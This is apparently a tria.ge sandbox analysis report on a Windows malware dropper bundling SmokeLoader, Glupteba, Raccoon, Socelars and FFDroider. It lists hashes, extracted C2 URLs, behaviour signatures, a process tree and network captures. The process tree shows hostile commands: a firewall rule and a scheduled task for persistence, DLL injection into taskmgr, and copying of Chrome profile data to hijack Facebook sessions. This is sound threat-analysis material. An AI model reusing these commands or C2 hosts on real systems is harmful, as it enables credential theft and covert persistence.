Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
04/10/2024, 18:01 UTC
241004-wl132axhpm 1022/04/2024, 20:52 UTC
240422-znvwksgb77 1027/02/2024, 22:40 UTC
240227-2lykssdc83 1003/01/2024, 09:53 UTC
240103-lw3dqscehj 1029/12/2023, 23:48 UTC
231229-3txtxadcb8 10Analysis
-
max time kernel
1s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/12/2023, 23:48 UTC
Static task
static1
Behavioral task
behavioral1
Sample
078192e792b12a8d9980f364e110155c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
078192e792b12a8d9980f364e110155c.exe
Resource
win10v2004-20231215-en
General
-
Target
078192e792b12a8d9980f364e110155c.exe
-
Size
8.7MB
-
MD5
078192e792b12a8d9980f364e110155c
-
SHA1
89596e27530eeccd6ad9644aa045e8e0499301a1
-
SHA256
67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
-
SHA512
72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
-
SSDEEP
196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J
Malware Config
Extracted
smokeloader
pub2
Extracted
ffdroider
http://186.2.171.3
Extracted
metasploit
windows/single_exec
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
1.7.3
92be0387873e54dd629b9bfa972c3a9a88e6726c
-
url4cnc
https://t.me/gishsunsetman
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/files/0x00080000000231e0-24.dat family_fabookie behavioral2/files/0x00080000000231e0-29.dat family_fabookie -
FFDroider payload 3 IoCs
resource yara_rule behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp family_ffdroider -
Glupteba payload 9 IoCs
resource yara_rule behavioral2/memory/452-189-0x0000000005240000-0x0000000005B66000-memory.dmp family_glupteba behavioral2/memory/452-192-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/452-198-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/452-202-0x0000000005240000-0x0000000005B66000-memory.dmp family_glupteba behavioral2/memory/5320-240-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/5320-272-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1421-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1441-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba behavioral2/memory/1376-1998-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3748 4968 rUNdlL32.eXe 103 -
Raccoon Stealer V1 payload 4 IoCs
resource yara_rule behavioral2/memory/6644-1347-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1348-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1352-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral2/memory/6644-1350-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 2 IoCs
resource yara_rule behavioral2/files/0x00060000000231e7-42.dat family_socelars behavioral2/files/0x00060000000231e7-50.dat family_socelars -
Nirsoft 3 IoCs
resource yara_rule behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 5700 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 078192e792b12a8d9980f364e110155c.exe -
Executes dropped EXE 2 IoCs
pid Process 3068 Files.exe 1196 KRSetp.exe -
resource yara_rule behavioral2/memory/3348-181-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/3348-179-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/5216-235-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral2/memory/5216-230-0x0000000000400000-0x0000000000422000-memory.dmp upx -
resource yara_rule behavioral2/memory/3616-128-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-127-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-239-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect behavioral2/memory/3616-1986-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 11 ipinfo.io 13 ipinfo.io 21 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1608 3372 WerFault.exe 110 5800 2340 WerFault.exe 96 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3228 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 87 Go-http-client/1.1 -
Kills process with taskkill 1 IoCs
pid Process 3480 taskkill.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 3068 712 078192e792b12a8d9980f364e110155c.exe 91 PID 712 wrote to memory of 1196 712 078192e792b12a8d9980f364e110155c.exe 94 PID 712 wrote to memory of 1196 712 078192e792b12a8d9980f364e110155c.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5216
-
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵PID:2900
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 3683⤵
- Program crash
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS672⤵PID:2432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff9592047183⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:83⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:33⤵PID:3060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:13⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵PID:3256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:23⤵PID:2036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:83⤵PID:5516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:83⤵PID:5500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:13⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:13⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:13⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:23⤵PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵PID:6628
-
-
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵PID:5320
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:5916
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /94-944⤵PID:1376
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:2824
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵PID:2316
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:5168
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:3480
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y3⤵PID:1324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/3⤵PID:5864
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:1764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:2796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:24⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:1412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:5952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:14⤵PID:6352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:6096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:84⤵PID:6052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:24⤵PID:6856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a1⤵PID:1116
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1548
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵PID:3372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 6042⤵
- Program crash
PID:1608
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 33721⤵PID:2992
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 23401⤵PID:5768
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:5700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b97781⤵PID:5892
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1804
Network
-
Remote address:8.8.8.8:53Request19.177.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request158.240.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:8.8.8.8:53Requestip-api.comIN A
-
Remote address:8.8.8.8:53Requestwww.listincode.comIN AResponsewww.listincode.comIN A199.59.243.225
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.186.192
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request192.186.117.34.in-addr.arpaIN PTRResponse192.186.117.34.in-addr.arpaIN PTR19218611734bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Requestmusic-sec.xyzIN AResponse
-
Remote address:8.8.8.8:53Requestiplogger.orgIN AResponseiplogger.orgIN A172.67.132.113iplogger.orgIN A104.21.4.208
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 313
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Request113.132.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request113.132.67.172.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request225.243.59.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request225.243.59.199.in-addr.arpaIN PTR
-
Remote address:186.2.171.3:80RequestGET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 186.2.171.3
ResponseHTTP/1.1 301 Moved Permanently
Date: Sat, 30 Dec 2023 17:50:48 GMT
Connection: keep-alive
Keep-Alive: timeout=60
